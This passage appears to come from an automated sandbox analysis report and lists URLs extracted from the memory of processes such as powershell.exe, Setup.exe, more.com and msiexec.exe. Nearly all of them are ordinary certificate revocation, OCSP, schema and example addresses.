              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD685A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD6864A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp, Updater.ex.0.dr, NAudio.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD685A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD6864A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp, Updater.ex.0.dr, NAudio.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD685A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD6864A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp, Updater.ex.0.dr, NAudio.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD675A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://contoso.com/rdweb/Feed/webfeed.aspx.
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
              Source: Setup.exe, 00000003.00000003.1927689834.0000000003611000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
              Source: Setup.exe, 00000003.00000003.1927689834.0000000003611000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
              Source: msiexec.exe, 0000000B.00000003.2506550494.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580282480.00000000033F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: msiexec.exe, 0000000B.00000003.2348764424.0000000005F37000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: Setup.exe, 00000003.00000002.1937585678.0000000002BAD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210763818.0000000002C76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.d
              Source: Setup.exe, 00000003.00000002.1937585678.0000000002BAD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210763818.0000000002C76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicer
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD685A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp, Updater.ex.0.dr, NAudio.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
              Source: msiexec.exe, 0000000B.00000003.2348764424.0000000005F37000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: msiexec.exe, 0000000B.00000003.2348764424.0000000005F37000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD685A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD6864A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp, Updater.ex.0.dr, NAudio.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD685A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD6864A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp, Updater.ex.0.dr, NAudio.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: NAudio.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: msiexec.exe, 0000000B.00000003.2348764424.0000000005F37000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD68507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp, Updater.ex.0.dr, NAudio.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD685A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD6864A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
              Source: msiexec.exe, 0000000B.00000003.2348764424.0000000005F37000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: nca.adml.0.drString found in binary or memory: http://myserver.corp.contoso.com/
              Source: Setup.exe, 00000003.00000002.1937585678.0000000002BAD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210763818.0000000002C76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.c
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD685A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD6864A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2348764424.0000000005F37000.00000004.00000001.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp, Updater.ex.0.dr, NAudio.dll.0.drString found in binary or memory: http://ocsp.digicert.com0
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD685A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD6864A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp, Updater.ex.0.dr, NAudio.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD685A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp, Updater.ex.0.dr, NAudio.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD685A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD6864A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp, Updater.ex.0.dr, NAudio.dll.0.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: Setup.exe, 00000003.00000003.1927689834.0000000003611000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
              Source: Setup.exe, 00000003.00000003.1927689834.0000000003611000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
              Source: msiexec.exe, 0000000B.00000003.2348764424.0000000005F37000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD66AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: Setup.exe, 0000000C.00000002.2211304501.000000006AE0A000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://python.org/dev/peps/pep-0263/
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.certum.pl/ctnca.cer09
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.certum.pl/ctnca2.cer09
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.certum.pl/ctsca2021.cer0A
              Source: Setup.exe, 00000003.00000003.1927689834.0000000003611000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: Setup.exe, 00000003.00000003.1927689834.0000000003611000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD66AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD668B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2588541617.0000000004D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD66AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: Setup.exe, 00000003.00000003.1927689834.0000000003611000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
              Source: Setup.exe, 00000003.00000003.1927689834.0000000003611000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://subca.ocsp-certum.com01
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://subca.ocsp-certum.com02
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://subca.ocsp-certum.com05
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
              Source: Setup.exe, 00000003.00000003.1927689834.0000000003611000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: Setup.exe, 00000003.00000003.1927689834.0000000003611000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: Setup.exe, 00000003.00000003.1927689834.0000000003611000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD66AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certum.pl/CPS0
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD685A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD6864A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp, Updater.ex.0.dr, NAudio.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.000000000505D000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002D75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
